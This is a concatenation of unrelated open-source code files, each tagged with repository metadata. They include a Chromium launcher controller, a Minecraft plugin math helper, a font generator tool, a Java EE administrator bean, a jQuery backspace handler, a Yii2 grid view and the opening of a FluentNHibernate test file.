ash::LauncherItem item = model_->items()[index];
item.image = image;
model_->Set(index, item);
// It's possible we're waiting on more than one item, so don't break.
}
}
void ChromeLauncherControllerPerBrowser::OnAutoHideBehaviorChanged(
ash::ShelfAutoHideBehavior new_behavior) {
std::string behavior_string;
ash::Shell::RootWindowList root_windows;
if (ash::Shell::IsLauncherPerDisplayEnabled())
root_windows = ash::Shell::GetAllRootWindows();
else
root_windows.push_back(ash::Shell::GetPrimaryRootWindow());
for (ash::Shell::RootWindowList::const_iterator iter =
root_windows.begin();
iter != root_windows.end(); ++iter) {
SetShelfAutoHideBehaviorPrefs(new_behavior, *iter);
}
}
void ChromeLauncherControllerPerBrowser::SetLauncherItemImage(
ash::LauncherID launcher_id,
const gfx::ImageSkia& image) {
int index = model_->ItemIndexByID(launcher_id);
if (index == -1)
return;
ash::LauncherItem item = model_->items()[index];
item.image = image;
model_->Set(index, item);
}
bool ChromeLauncherControllerPerBrowser::IsAppPinned(
const std::string& app_id) {
for (IDToItemControllerMap::const_iterator i =
id_to_item_controller_map_.begin();
i != id_to_item_controller_map_.end(); ++i) {
if (IsPinned(i->first) && i->second->app_id() == app_id)
return true;
}
return false;
}
void ChromeLauncherControllerPerBrowser::PinAppWithID(
const std::string& app_id) {
if (CanPin())
DoPinAppWithID(app_id);
else
NOTREACHED();
}
void ChromeLauncherControllerPerBrowser::SetLaunchType(
ash::LauncherID id,
extensions::ExtensionPrefs::LaunchType launch_type) {
if (!HasItemController(id))
return;
return profile_->GetExtensionService()->extension_prefs()->SetLaunchType(
id_to_item_controller_map_[id]->app_id(), launch_type);
}
void ChromeLauncherControllerPerBrowser::UnpinAppsWithID(
const std::string& app_id) {
if (CanPin())
DoUnpinAppsWithID(app_id);
else
NOTREACHED();
}
bool ChromeLauncherControllerPerBrowser::IsLoggedInAsGuest() {
return ProfileManager::GetDefaultProfileOrOffTheRecord()->IsOffTheRecord();
}
void ChromeLauncherControllerPerBrowser::CreateNewWindow() {
chrome::NewEmptyWindow(
GetProfileForNewWindows(), chrome::HOST_DESKTOP_TYPE_ASH);
}
void ChromeLauncherControllerPerBrowser::CreateNewIncognitoWindow() {
chrome::NewEmptyWindow(GetProfileForNewWindows()->GetOffTheRecordProfile(),
chrome::HOST_DESKTOP_TYPE_ASH);
}
bool ChromeLauncherControllerPerBrowser::CanPin() const {
const PrefService::Preference* pref =
profile_->GetPrefs()->FindPreference(prefs::kPinnedLauncherApps);
return pref && pref->IsUserModifiable();
}
ash::ShelfAutoHideBehavior
ChromeLauncherControllerPerBrowser::GetShelfAutoHideBehavior(
aura::RootWindow* root_window) const {
// Don't show the shelf in the app mode.
if (chrome::IsRunningInAppMode())
return ash::SHELF_AUTO_HIDE_ALWAYS_HIDDEN;
// See comment in |kShelfAlignment| as to why we consider two prefs.
const std::string behavior_value(
GetPrefForRootWindow(profile_->GetPrefs(),
root_window,
prefs::kShelfAutoHideBehaviorLocal,
prefs::kShelfAutoHideBehavior));
// Note: To maintain sync compatibility with old images of chrome/chromeos
// the set of values that may be encountered includes the now-extinct
// "Default" as well as "Never" and "Always", "Default" should now
// be treated as "Never" (http://crbug.com/146773).
if (behavior_value == ash::kShelfAutoHideBehaviorAlways)
return ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS;
return ash::SHELF_AUTO_HIDE_BEHAVIOR_NEVER;
}
bool ChromeLauncherControllerPerBrowser::CanUserModifyShelfAutoHideBehavior(
aura::RootWindow* root_window) const {
return profile_->GetPrefs()->
FindPreference(prefs::kShelfAutoHideBehaviorLocal)->IsUserModifiable();
}
void ChromeLauncherControllerPerBrowser::ToggleShelfAutoHideBehavior(
aura::RootWindow* root_window) {
ash::ShelfAutoHideBehavior behavior = GetShelfAutoHideBehavior(root_window) ==
ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS ?
ash::SHELF_AUTO_HIDE_BEHAVIOR_NEVER :
ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS;
SetShelfAutoHideBehaviorPrefs(behavior, root_window);
return;
}
void ChromeLauncherControllerPerBrowser::RemoveTabFromRunningApp(
WebContents* tab,
const std::string& app_id) {
web_contents_to_app_id_.erase(tab);
AppIDToWebContentsListMap::iterator i_app_id =
app_id_to_web_contents_list_.find(app_id);
if (i_app_id != app_id_to_web_contents_list_.end()) {
WebContentsList* tab_list = &i_app_id->second;
tab_list->remove(tab);
if (tab_list->empty()) {
app_id_to_web_contents_list_.erase(i_app_id);
i_app_id = app_id_to_web_contents_list_.end();
ash::LauncherID id = GetLauncherIDForAppID(app_id);
if (id > 0)
SetItemStatus(id, ash::STATUS_CLOSED);
}
}
}
void ChromeLauncherControllerPerBrowser::UpdateAppState(
content::WebContents* contents,
AppState app_state) {
std::string app_id = GetAppID(contents);
// Check the old |app_id| for a tab. If the contents has changed we need to
// remove it from the previous app.
if (web_contents_to_app_id_.find(contents) != web_contents_to_app_id_.end()) {
std::string last_app_id = web_contents_to_app_id_[contents];
if (last_app_id != app_id)
RemoveTabFromRunningApp(contents, last_app_id);
}
if (app_id.empty())
return;
web_contents_to_app_id_[contents] = app_id;
if (app_state == APP_STATE_REMOVED) {
// The tab has gone away.
RemoveTabFromRunningApp(contents, app_id);
} else {
WebContentsList& tab_list(app_id_to_web_contents_list_[app_id]);
if (app_state == APP_STATE_INACTIVE) {
WebContentsList::const_iterator i_tab =
std::find(tab_list.begin(), tab_list.end(), contents);
if (i_tab == tab_list.end())
tab_list.push_back(contents);
if (i_tab != tab_list.begin()) {
// Going inactive, but wasn't the front tab, indicating that a new
// tab has already become active.
return;
}
} else {
tab_list.remove(contents);
tab_list.push_front(contents);
}
ash::LauncherID id = GetLauncherIDForAppID(app_id);
if (id > 0) {
// If the window is active, mark the app as active.
SetItemStatus(id, app_state == APP_STATE_WINDOW_ACTIVE ?
ash::STATUS_ACTIVE : ash::STATUS_RUNNING);
}
}
}
void ChromeLauncherControllerPerBrowser::SetRefocusURLPatternForTest(
ash::LauncherID id,
const GURL& url) {
DCHECK(HasItemController(id));
LauncherItemController* controller = id_to_item_controller_map_[id];
int index = model_->ItemIndexByID(id);
if (index == -1) {
NOTREACHED() << "Invalid launcher id";
return;
}
ash::LauncherItemType type = model_->items()[index].type;
if (type == ash::TYPE_APP_SHORTCUT) {
AppShortcutLauncherItemController* app_controller =
static_cast<AppShortcutLauncherItemController*>(controller);
app_controller->set_refocus_url(url);
} else {
NOTREACHED() << "Invalid launcher type";
}
}
const Extension* ChromeLauncherControllerPerBrowser::GetExtensionForAppID(
const std::string& app_id) const {
return profile_->GetExtensionService()->GetInstalledExtension(app_id);
}
void ChromeLauncherControllerPerBrowser::OnBrowserShortcutClicked(
int event_flags) {
if (event_flags & ui::EF_CONTROL_DOWN) {
CreateNewWindow();
return;
}
Browser* last_browser = chrome::FindTabbedBrowser(
GetProfileForNewWindows(), true, chrome::HOST_DESKTOP_TYPE_ASH);
if (!last_browser) {
CreateNewWindow();
return;
}
aura::Window* window = last_browser->window()->GetNativeWindow();
window->Show();
ash::wm::ActivateWindow(window);
}
void ChromeLauncherControllerPerBrowser::ItemClicked(
const ash::LauncherItem& item,
const ui::Event& event) {
DCHECK(HasItemController(item.id));
id_to_item_controller_map_[item.id]->Clicked(event);
}
int ChromeLauncherControllerPerBrowser::GetBrowserShortcutResourceId() {
return IDR_PRODUCT_LOGO_32;
}
string16 ChromeLauncherControllerPerBrowser::GetTitle(
const ash::LauncherItem& item) {
DCHECK(HasItemController(item.id));
return id_to_item_controller_map_[item.id]->GetTitle();
}
ui::MenuModel* ChromeLauncherControllerPerBrowser::CreateContextMenu(
const ash::LauncherItem& item,
aura::RootWindow* root_window) {
return new LauncherContextMenu(this, &item, root_window);
}
ash::LauncherMenuModel*
ChromeLauncherControllerPerBrowser::CreateApplicationMenu(
const ash::LauncherItem& item,
int event_flags) {
// Not used by this launcher type.
return NULL;
}
ash::LauncherID ChromeLauncherControllerPerBrowser::GetIDByWindow(
aura::Window* window) {
for (IDToItemControllerMap::const_iterator i =
id_to_item_controller_map_.begin();
i != id_to_item_controller_map_.end(); ++i) {
if (i->second->HasWindow(window))
return i->first;
}
return 0;
}
bool ChromeLauncherControllerPerBrowser::IsDraggable(
const ash::LauncherItem& item) {
return item.type == ash::TYPE_APP_SHORTCUT ? CanPin() : true;
}
bool ChromeLauncherControllerPerBrowser::ShouldShowTooltip(
const ash::LauncherItem& item) {
if (item.type == ash::TYPE_APP_PANEL &&
id_to_item_controller_map_[item.id]->IsVisible())
return false;
return true;
}
void ChromeLauncherControllerPerBrowser::OnLauncherCreated(
ash::Launcher* launcher) {
launchers_.insert(launcher);
launcher->shelf_widget()->shelf_layout_manager()->AddObserver(this);
}
void ChromeLauncherControllerPerBrowser::OnLauncherDestroyed(
ash::Launcher* launcher) {
launchers_.erase(launcher);
// RemoveObserver is not called here, since by the time this method is called
// Launcher is already in its destructor.
}
void ChromeLauncherControllerPerBrowser::LauncherItemAdded(int index) {
}
void ChromeLauncherControllerPerBrowser::LauncherItemRemoved(
int index,
ash::LauncherID id) {
}
void ChromeLauncherControllerPerBrowser::LauncherItemMoved(
int start_index,
int target_index) {
ash::LauncherID id = model_->items()[target_index].id;
if (HasItemController(id) && IsPinned(id))
PersistPinnedState();
}
void ChromeLauncherControllerPerBrowser::LauncherItemChanged(
int index,
const ash::LauncherItem& old_item) {
ash::LauncherID id = model_->items()[index].id;
id_to_item_controller_map_[id]->LauncherItemChanged(index, old_item);
}
void ChromeLauncherControllerPerBrowser::LauncherStatusChanged() {
}
void ChromeLauncherControllerPerBrowser::Observe(
int type,
const content::NotificationSource& source,
const content::NotificationDetails& details) {
switch (type) {
case chrome::NOTIFICATION_EXTENSION_LOADED: {
const Extension* extension =
content::Details<const Extension>(details).ptr();
if (IsAppPinned(extension->id())) {
// Clear and re-fetch to ensure icon is up-to-date.
app_icon_loader_->ClearImage(extension->id());
app_icon_loader_->FetchImage(extension->id());
}
UpdateAppLaunchersFromPref();
break;
}
case chrome::NOTIFICATION_EXTENSION_UNLOADED: {
const content::Details<extensions::UnloadedExtensionInfo>& unload_info(
details);
const Extension* extension = unload_info->extension;
if (IsAppPinned(extension->id())) {
if (unload_info->reason == extension_misc::UNLOAD_REASON_UNINSTALL) {
DoUnpinAppsWithID(extension->id());
app_icon_loader_->ClearImage(extension->id());
} else {
app_icon_loader_->UpdateImage(extension->id());
}
}
break;
}
default:
NOTREACHED() << "Unexpected notification type=" << type;
}
}
void ChromeLauncherControllerPerBrowser::OnShelfAlignmentChanged(
aura::RootWindow* root_window) {
const char* pref_value = NULL;
switch (ash::Shell::GetInstance()->GetShelfAlignment(root_window)) {
case ash::SHELF_ALIGNMENT_BOTTOM:
pref_value = ash::kShelfAlignmentBottom;
break;
case ash::SHELF_ALIGNMENT_LEFT:
pref_value = ash::kShelfAlignmentLeft;
break;
case ash::SHELF_ALIGNMENT_RIGHT:
pref_value = ash::kShelfAlignmentRight;
break;
case ash::SHELF_ALIGNMENT_TOP:
pref_value = ash::kShelfAlignmentTop;
break;
}
UpdatePerDisplayPref(
profile_->GetPrefs(), root_window, prefs::kShelfAlignment, pref_value);
if (root_window == ash::Shell::GetPrimaryRootWindow()) {
// See comment in |kShelfAlignment| about why we have two prefs here.
profile_->GetPrefs()->SetString(prefs::kShelfAlignmentLocal, pref_value);
profile_->GetPrefs()->SetString(prefs::kShelfAlignment, pref_value);
}
}
void ChromeLauncherControllerPerBrowser::OnDisplayConfigurationChanging() {
}
void ChromeLauncherControllerPerBrowser::OnDisplayConfigurationChanged() {
SetShelfBehaviorsFromPrefs();
}
void ChromeLauncherControllerPerBrowser::OnIsSyncingChanged() {
PrefServiceSyncable* prefs = PrefServiceSyncable::FromProfile(profile_);
MaybePropagatePrefToLocal(prefs,
prefs::kShelfAlignmentLocal,
prefs::kShelfAlignment);
MaybePropagatePrefToLocal(prefs,
prefs::kShelfAutoHideBehaviorLocal,
prefs::kShelfAutoHideBehavior);
}
void ChromeLauncherControllerPerBrowser::OnAppSyncUIStatusChanged() {
if (app_sync_ui_state_->status() == AppSyncUIState::STATUS_SYNCING)
model_->SetStatus(ash::LauncherModel::STATUS_LOADING);
else
model_->SetStatus(ash::LauncherModel::STATUS_NORMAL);
}
void ChromeLauncherControllerPerBrowser::ExtensionEnableFlowFinished() {
LaunchApp(extension_enable_flow_->extension_id(), ui::EF_NONE);
extension_enable_flow_.reset();
}
void ChromeLauncherControllerPerBrowser::ExtensionEnableFlowAborted(
bool user_initiated) {
extension_enable_flow_.reset();
}
void ChromeLauncherControllerPerBrowser::PersistPinnedState() {
// It is a coding error to call PersistPinnedState() if the pinned apps are
// not user-editable. The code should check earlier and not perform any
// modification actions that trigger persisting the state.
if (!CanPin()) {
NOTREACHED() << "Can't pin but pinned state being updated";
return;
}
// Mutating kPinnedLauncherApps is going to notify us and trigger us to
// process the change. We don't want that to happen so remove ourselves as a
// listener.
pref_change_registrar_.Remove(prefs::kPinnedLauncherApps);
{
ListPrefUpdate updater(profile_->GetPrefs(), prefs::kPinnedLauncherApps);
updater->Clear();
for (size_t i = 0; i < model_->items().size(); ++i) {
if (model_->items()[i].type == ash::TYPE_APP_SHORTCUT) {
ash::LauncherID id = model_->items()[i].id;
if (HasItemController(id) && IsPinned(id)) {
base::DictionaryValue* app_value = ash::CreateAppDict(
id_to_item_controller_map_[id]->app_id());
if (app_value)
updater->Append(app_value);
}
}
}
}
pref_change_registrar_.Add(
prefs::kPinnedLauncherApps,
base::Bind(&ChromeLauncherControllerPerBrowser::
UpdateAppLaunchersFromPref,
base::Unretained(this)));
}
ash::LauncherModel* ChromeLauncherControllerPerBrowser::model() {
return model_;
}
Profile* ChromeLauncherControllerPerBrowser::profile() {
return profile_;
}
Profile* ChromeLauncherControllerPerBrowser::GetProfileForNewWindows() {
return ProfileManager::GetDefaultProfileOrOffTheRecord();
}
void ChromeLauncherControllerPerBrowser::LauncherItemClosed(
ash::LauncherID id) {
IDToItemControllerMap::iterator iter = id_to_item_controller_map_.find(id);
DCHECK(iter != id_to_item_controller_map_.end());
app_icon_loader_->ClearImage(iter->second->app_id());
iter->second->OnRemoved();
id_to_item_controller_map_.erase(iter);
model_->RemoveItemAt(model_->ItemIndexByID(id));
}
void ChromeLauncherControllerPerBrowser::DoPinAppWithID(
const std::string& app_id) {
// If there is an item, do nothing and return.
if (IsAppPinned(app_id))
return;
ash::LauncherID launcher_id = GetLauncherIDForAppID(app_id);
if (launcher_id) {
// App item exists, pin it
Pin(launcher_id);
} else {
// Otherwise, create a shortcut item for it.
CreateAppShortcutLauncherItem(app_id, model_->item_count());
if (CanPin())
PersistPinnedState();
}
}
void ChromeLauncherControllerPerBrowser::DoUnpinAppsWithID(
const std::string& app_id) {
for (IDToItemControllerMap::iterator i = id_to_item_controller_map_.begin();
i != id_to_item_controller_map_.end(); ) {
IDToItemControllerMap::iterator current(i);
++i;
if (current->second->app_id() == app_id && IsPinned(current->first))
Unpin(current->first);
}
}
void ChromeLauncherControllerPerBrowser::UpdateAppLaunchersFromPref() {
// Construct a vector representation of to-be-pinned apps from the pref.
std::vector<std::string> pinned_apps;
const base::ListValue* pinned_apps_pref =
profile_->GetPrefs()->GetList(prefs::kPinnedLauncherApps);
for (base::ListValue::const_iterator it(pinned_apps_pref->begin());
it != pinned_apps_pref->end(); ++it) {
DictionaryValue* app = NULL;
std::string app_id;
if ((*it)->GetAsDictionary(&app) &&
app->GetString(ash::kPinnedAppsPrefAppIDPath, &app_id) &&
std::find(pinned_apps.begin(), pinned_apps.end(), app_id) ==
pinned_apps.end() &&
app_tab_helper_->IsValidID(app_id)) {
pinned_apps.push_back(app_id);
}
}
// Walk the model and |pinned_apps| from the pref lockstep, adding and
// removing items as necessary. NB: This code uses plain old indexing instead
// of iterators because of model mutations as part of the loop.
std::vector<std::string>::const_iterator pref_app_id(pinned_apps.begin());
int index = 0;
for (; index < model_->item_count() && pref_app_id != pinned_apps.end();
++index) {
// If the next app launcher according to the pref is present in the model,
// delete all app launcher entries in between.
if (IsAppPinned(*pref_app_id)) {
for (; index < model_->item_count(); ++index) {
const ash::LauncherItem& item(model_->items()[index]);
if (item.type != ash::TYPE_APP_SHORTCUT)
continue;
IDToItemControllerMap::const_iterator entry =
id_to_item_controller_map_.find(item.id);
if (entry != id_to_item_controller_map_.end() &&
entry->second->app_id() == *pref_app_id) {
++pref_app_id;
break;
} else {
LauncherItemClosed(item.id);
--index;
}
}
// If the item wasn't found, that means id_to_item_controller_map_
// is out of sync.
DCHECK(index < model_->item_count());
} else {
// This app wasn't pinned before, insert a new entry.
ash::LauncherID id = CreateAppShortcutLauncherItem(*pref_app_id, index);
index = model_->ItemIndexByID(id);
++pref_app_id;
}
}
// Remove any trailing existing items.
while (index < model_->item_count()) {
const ash::LauncherItem& item(model_->items()[index]);
if (item.type == ash::TYPE_APP_SHORTCUT)
LauncherItemClosed(item.id);
else
++index;
}
// Append unprocessed items from the pref to the end of the model.
for (; pref_app_id != pinned_apps.end(); ++pref_app_id)
DoPinAppWithID(*pref_app_id);
}
void ChromeLauncherControllerPerBrowser::SetShelfAutoHideBehaviorPrefs(
ash::ShelfAutoHideBehavior behavior,
aura::RootWindow* root_window) {
const char* value = NULL;
switch (behavior) {
case ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS:
value = ash::kShelfAutoHideBehaviorAlways;
break;
case ash::SHELF_AUTO_HIDE_BEHAVIOR_NEVER:
value = ash::kShelfAutoHideBehaviorNever;
break;
case ash::SHELF_AUTO_HIDE_ALWAYS_HIDDEN:
// This one should not be a valid preference option for now. We only want
// to completely hide it when we run app mode.
NOTREACHED();
return;
}
UpdatePerDisplayPref(
profile_->GetPrefs(), root_window, prefs::kShelfAutoHideBehavior, value);
if (root_window == ash::Shell::GetPrimaryRootWindow()) {
// See comment in |kShelfAlignment| about why we have two prefs here.
profile_->GetPrefs()->SetString(prefs::kShelfAutoHideBehaviorLocal, value);
profile_->GetPrefs()->SetString(prefs::kShelfAutoHideBehavior, value);
}
}
void ChromeLauncherControllerPerBrowser::SetShelfAutoHideBehaviorFromPrefs() {
ash::Shell::RootWindowList root_windows;
if (ash::Shell::IsLauncherPerDisplayEnabled())
root_windows = ash::Shell::GetAllRootWindows();
else
root_windows.push_back(ash::Shell::GetPrimaryRootWindow());
for (ash::Shell::RootWindowList::const_iterator iter = root_windows.begin();
iter != root_windows.end(); ++iter) {
ash::Shell::GetInstance()->SetShelfAutoHideBehavior(
GetShelfAutoHideBehavior(*iter), *iter);
}
}
void ChromeLauncherControllerPerBrowser::SetShelfAlignmentFromPrefs() {
if (!CommandLine::ForCurrentProcess()->HasSwitch(
switches::kShowLauncherAlignmentMenu))
return;
ash::Shell::RootWindowList root_windows;
if (ash::Shell::IsLauncherPerDisplayEnabled())
root_windows = ash::Shell::GetAllRootWindows();
else
root_windows.push_back(ash::Shell::GetPrimaryRootWindow());
for (ash::Shell::RootWindowList::const_iterator iter = root_windows.begin();
iter != root_windows.end(); ++iter) {
// See comment in |kShelfAlignment| as to why we consider two prefs.
const std::string alignment_value(
GetPrefForRootWindow(profile_->GetPrefs(),
*iter,
prefs::kShelfAlignmentLocal,
prefs::kShelfAlignment));
ash::ShelfAlignment alignment = ash::SHELF_ALIGNMENT_BOTTOM;
if (alignment_value == ash::kShelfAlignmentLeft)
alignment = ash::SHELF_ALIGNMENT_LEFT;
else if (alignment_value == ash::kShelfAlignmentRight)
alignment = ash::SHELF_ALIGNMENT_RIGHT;
else if (alignment_value == ash::kShelfAlignmentTop)
alignment = ash::SHELF_ALIGNMENT_TOP;
ash::Shell::GetInstance()->SetShelfAlignment(alignment, *iter);
}
}
void ChromeLauncherControllerPerBrowser::SetShelfBehaviorsFromPrefs() {
SetShelfAutoHideBehaviorFromPrefs();
SetShelfAlignmentFromPrefs();
}
WebContents* ChromeLauncherControllerPerBrowser::GetLastActiveWebContents(
const std::string& app_id) {
AppIDToWebContentsListMap::const_iterator i =
app_id_to_web_contents_list_.find(app_id);
if (i == app_id_to_web_contents_list_.end())
return NULL;
DCHECK_GT(i->second.size(), 0u);
return *i->second.begin();
}
ash::LauncherID ChromeLauncherControllerPerBrowser::InsertAppLauncherItem(
LauncherItemController* controller,
const std::string& app_id,
ash::LauncherItemStatus status,
int index) {
ash::LauncherID id = model_->next_id();
DCHECK(!HasItemController(id));
DCHECK(controller);
id_to_item_controller_map_[id] = controller;
controller->set_launcher_id(id);
ash::LauncherItem item;
item.type = controller->GetLauncherItemType();
item.is_incognito = false;
item.image = extensions::IconsInfo::GetDefaultAppIcon();
WebContents* active_tab = GetLastActiveWebContents(app_id);
if (active_tab) {
Browser* browser = chrome::FindBrowserWithWebContents(active_tab);
DCHECK(browser);
if (browser->window()->IsActive())
status = ash::STATUS_ACTIVE;
else
status = ash::STATUS_RUNNING;
}
item.status = status;
model_->AddAt(index, item);
app_icon_loader_->FetchImage(app_id);
return id;
}
bool ChromeLauncherControllerPerBrowser::HasItemController(
ash::LauncherID id) const {
return id_to_item_controller_map_.find(id) !=
id_to_item_controller_map_.end();
}
ash::LauncherID
ChromeLauncherControllerPerBrowser::CreateAppShortcutLauncherItem(
const std::string& app_id,
int index) {
AppShortcutLauncherItemController* controller =
new AppShortcutLauncherItemController(app_id, this);
ash::LauncherID launcher_id = InsertAppLauncherItem(
controller, app_id, ash::STATUS_CLOSED, index);
return launcher_id;
}
void ChromeLauncherControllerPerBrowser::SetAppTabHelperForTest(
AppTabHelper* helper) {
app_tab_helper_.reset(helper);
}
void ChromeLauncherControllerPerBrowser::SetAppIconLoaderForTest(
extensions::AppIconLoader* loader) {
app_icon_loader_.reset(loader);
}
const std::string&
ChromeLauncherControllerPerBrowser::GetAppIdFromLauncherIdForTest(
ash::LauncherID id) {
return id_to_item_controller_map_[id]->app_id();
}
| codenote/chromium-test | chrome/browser/ui/ash/launcher/chrome_launcher_controller_per_browser.cc | C++ | bsd-3-clause | 47,718 |
package me.michidk.zsurvivalgames.utils;
import org.bukkit.Bukkit;
import org.bukkit.Location;
import org.bukkit.entity.Player;
import java.util.ArrayList;
import java.util.List;
/**
* Created with IntelliJ IDEA.
* User: ml
* Date: 03.09.13
* Time: 13:33
* To change this template use File | Settings | File Templates.
*/
public class MathHelper {
public static List<Location> getCircleLocs(Location loc, Integer r, Integer h, Boolean hollow, Boolean sphere, int plus_y) {
List<Location> circleblocks = new ArrayList<>();
int cx = loc.getBlockX();
int cy = loc.getBlockY();
int cz = loc.getBlockZ();
for (int x = cx - r; x <= cx + r; x++) {
for (int z = cz - r; z <= cz + r; z++) {
for (int y = (sphere ? cy - r : cy); y < (sphere ? cy + r : cy + h); y++) {
double dist = (cx - x) * (cx - x) + (cz - z) * (cz - z) + (sphere ? (cy - y) * (cy - y) : 0);
if (dist < r * r && !(hollow && dist < (r - 1) * (r - 1))) {
circleblocks.add(new Location(loc.getWorld(), x, y + plus_y, z));
}
}
}
}
return circleblocks;
}
public static double getPercentage(int now, int max) {
return Math.round(((double) now / (double) max) * 100D) / 100D;
}
public static void setXPProgress(Player p, int now, int max) {
p.setLevel(now);
p.setExp(1 - (float) (getPercentage(now, max)));
}
public static void setXPProgress(int now, int max) {
for (Player p : Bukkit.getOnlinePlayers()) {
setXPProgress(p, now, max);
}
}
public static float toDegree(double angle) {
return (float) Math.toDegrees(angle);
}
}
| FuseMCNetwork/ZSurvivalGames | src/main/java/me/michidk/zsurvivalgames/utils/MathHelper.java | Java | bsd-3-clause | 1,791 |
<?php
namespace DevGroup\DeferredTasks\Tests;
class ExampleTest extends \PHPUnit_Framework_TestCase
{
public function testExample()
{
$this->assertEquals('foo', 'foo');
}
}
| DevGroup-ru/yii2-deferred-tasks | tests/ExampleTest.php | PHP | bsd-3-clause | 195 |
#include <crtdbg.h>
#include "stdafx.h"
#include <et/core/tools.h>
#include <et/gui/fontgen.h>
using namespace et;
using namespace et::gui;
const int maxFontSize = 128;
const int maxFontOffset = 32;
void displayHelp(_TCHAR* argv[])
{
std::cout << "Using: " << std::endl
<< getFileName(argv[0]) << std::endl
<< " -out OUTFILENAME" << std::endl
<< " -face FONTFACE" << std::endl
<< " -size FONTSIZE" << std::endl
<< " -offset CHAROFFSET" << std::endl;
}
int _tmain(int argc, _TCHAR* argv[])
{
_CrtSetDbgFlag(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF);
std::string fontFace = "Tahoma";
std::string fontSize = "12";
std::string outFile = "";
std::string fontOffset = "0";
if ((argc == 1) || (argc % 2 == 0))
{
displayHelp(argv);
return 0;
}
for (int i = 1; i < argc; ++i)
{
if (strcmp(argv[i], "-help") == 0)
{
displayHelp(argv);
return 0;
}
else if (strcmp(argv[i], "-out") == 0)
{
if (++i >= argc) break;
outFile = argv[i];
}
else if (strcmp(argv[i], "-face") == 0)
{
if (++i >= argc) break;
fontFace = argv[i];
}
else if (strcmp(argv[i], "-size") == 0)
{
if (++i >= argc) break;
fontSize = argv[i];
}
else if (strcmp(argv[i], "-offset") == 0)
{
if (++i >= argc) break;
fontOffset = argv[i];
}
}
if (outFile.size() == 0)
outFile = fontFace;
FontGenerator gen;
gen.setFontFace(fontFace);
gen.setOutputFile(outFile);
int size = strToInt(fontSize);
if ((size < 0) || (size > maxFontSize))
{
std::cout << "Font size is not valid. Should be greater than zero and less than " << maxFontSize << std::endl;
return 0;
}
gen.setSize(size);
int offset = strToInt(fontOffset);
if ((offset < 0) || (offset > maxFontOffset))
{
std::cout << "Font offset is not valid. Should be greater than zero and less than " << maxFontSize << std::endl;
return 0;
}
gen.setOffset(static_cast<float>(offset));
std::cout << "Generating font: " << fontFace << ", " << fontSize << std::endl;
std::cout.flush();
switch (gen.generate())
{
case FontGeneratorResult_OutputFileFailed:
{
std::cout << "Output file failed to write." << std::endl;
break;
}
case FontGeneratorResult_OutputFileNotDefined:
{
std::cout << "Output file is not defined." << std::endl;
break;
}
case FontGeneratorResult_Success:
{
std::cout << "Success" << std::endl;
break;
}
default:
{
std::cout << "???" << std::endl;
}
}
return 0;
}
| sergeyreznik/et-engine | tools/FontGen/main.cpp | C++ | bsd-3-clause | 2,573 |
package ru.evgeniyosipov.facshop.store.ejb;
import ru.evgeniyosipov.facshop.entity.Administrator;
import ru.evgeniyosipov.facshop.entity.Groups;
import javax.ejb.Stateless;
import javax.persistence.EntityManager;
import javax.persistence.PersistenceContext;
import javax.persistence.Query;
import ru.evgeniyosipov.facshop.entity.Person;
@Stateless
public class AdministratorBean extends AbstractFacade<Administrator> {
@PersistenceContext(unitName = "facshopPU")
private EntityManager em;
private boolean lastAdministrator;
@Override
protected EntityManager getEntityManager() {
return em;
}
public Person getAdministratorByEmail(String email) {
Query createNamedQuery = getEntityManager().createNamedQuery("Person.findByEmail");
createNamedQuery.setParameter("email", email);
if (createNamedQuery.getResultList().size() > 0) {
return (Person) createNamedQuery.getSingleResult();
} else {
return null;
}
}
public AdministratorBean() {
super(Administrator.class);
}
@Override
public void create(Administrator admin) {
Groups adminGroup = (Groups) em.createNamedQuery("Groups.findByName")
.setParameter("name", "ADMINS")
.getSingleResult();
admin.getGroupsList().add(adminGroup);
adminGroup.getPersonList().add(admin);
em.persist(admin);
em.merge(adminGroup);
}
public boolean isLastAdmimistrator() {
return lastAdministrator;
}
@Override
public void remove(Administrator admin) {
Groups adminGroup = (Groups) em.createNamedQuery("Groups.findByName")
.setParameter("name", "ADMINS")
.getSingleResult();
if (adminGroup.getPersonList().size() > 1) {
adminGroup.getPersonList().remove(admin);
em.remove(em.merge(admin));
em.merge(adminGroup);
lastAdministrator = false;
} else {
lastAdministrator = true;
}
}
}
| evgeniyosipov/facshop | facshop-store/src/main/java/ru/evgeniyosipov/facshop/store/ejb/AdministratorBean.java | Java | bsd-3-clause | 2,075 |
/**
* Keydown
*
*/
module.exports = function() {
/*
* this swallows backspace keys on any non-input element.
* stops backspace -> back
*/
var rx = /INPUT|SELECT|TEXTAREA/i;
$('body').bind("keydown keypress", function(e) {
var key = e.keyCode || e.which;
if( key == 8) { // 8 == backspace or ENTER
if(!rx.test(e.target.tagName) || e.target.disabled || e.target.readOnly ){
e.preventDefault();
}
} else if(key == 13) {
}
});
};
| vulcan-estudios/bsk | src/app/helpers/events/keypress/backspace.js | JavaScript | bsd-3-clause | 552 |
<?php
use yii\helpers\Html;
use yii\grid\GridView;
/* @var $this yii\web\View */
/* @var $searchModel app\modules\autoparts\models\PartOverSearch */
/* @var $dataProvider yii\data\ActiveDataProvider */
$this->title = 'Part Overs';
$this->params['breadcrumbs'][] = $this->title;
?>
<div class="part-over-index">
<h1><?= Html::encode($this->title) ?></h1>
<?php // echo $this->render('_search', ['model' => $searchModel]); ?>
<p>
<?= Html::a('Создать запись', ['create'], ['class' => 'btn btn-success']) ?>
<?= Html::a('Загрузить CSV файл', ['upload'], ['class' => 'btn btn-primary']) ?>
</p>
<?= GridView::widget([
'dataProvider' => $dataProvider,
'filterModel' => $searchModel,
'columns' => [
['class' => 'yii\grid\SerialColumn'],
'code',
'name',
'manufacture',
'price',
'quantity',
'date_update',
'flagpostav',
// 'srokmin',
// 'srokmax',
// 'lotquantity',
// 'pricedate',
// 'skladid',
// 'sklad',
// 'flagpostav',
['class' => 'yii\grid\ActionColumn'],
],
]); ?>
</div>
| kd-brinex/kd | modules/autoparts/views/over/index.php | PHP | bsd-3-clause | 1,271 |
using System;
using System.Linq;
using System.Linq.Expressions;
using FluentNHibernate.Automapping.TestFixtures;
using FluentNHibernate.Conventions.Helpers.Builders;
using FluentNHibernate.Conventions.Instances;
using FluentNHibernate.Mapping;
using FluentNHibernate.MappingModel;
using FluentNHibernate.MappingModel.Identity;
using NUnit.Framework;
namespace FluentNHibernate.Testing.ConventionsTests.OverridingFluentInterface
{
